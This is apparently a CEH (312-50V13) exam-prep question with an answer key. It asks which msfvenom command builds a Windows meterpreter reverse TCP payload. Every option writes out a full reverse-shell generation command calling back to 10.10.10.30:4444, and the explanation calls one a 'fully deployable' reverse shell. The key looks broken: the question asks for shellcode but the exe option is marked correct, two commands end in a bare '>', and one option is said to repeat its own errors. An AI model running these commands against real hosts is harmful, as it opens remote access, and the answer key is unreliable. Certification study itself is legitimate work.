312-50V13 Question #268: Real Exam Question with Answer & Explanation

Question

what is the correct way of using MSFvenom to generate a reverse TCP shellcode for windows?

Options

• Amsfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c
• Bmsfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c
• Cmsfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe >
• Dmsfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe >

Explanation

MSFvenom Reverse TCP Shellcode Explanation

Option C is correct because it uses LHOST (Local Host - the attacker's IP that the victim connects back to), the proper -f exe format flag to generate a Windows executable file, and the > redirect operator to output the payload to a file, making it a fully deployable Windows reverse shell.

Why the distractors fail:

• Option A uses -f c, which outputs raw C-language shellcode - useful for embedding in exploit code, but not a standalone Windows executable ready for deployment.
• Option B incorrectly uses RHOST (Remote Host) instead of LHOST; since this is a reverse shell, the victim initiates the connection back to the attacker's machine, so the attacker's IP must be set with LHOST.
• Option D combines both errors from B and D - it uses RHOST instead of LHOST, making the payload non-functional despite having the correct -f exe > syntax.

💡 Memory Tip: Think "Reverse = LHOST"** - in a Reverse shell, the victim calls back to you, so you set LHOST (your local/listening address). If you use RHOST, you're thinking like a bind shell, which is the opposite direction.

No community discussion yet for this question.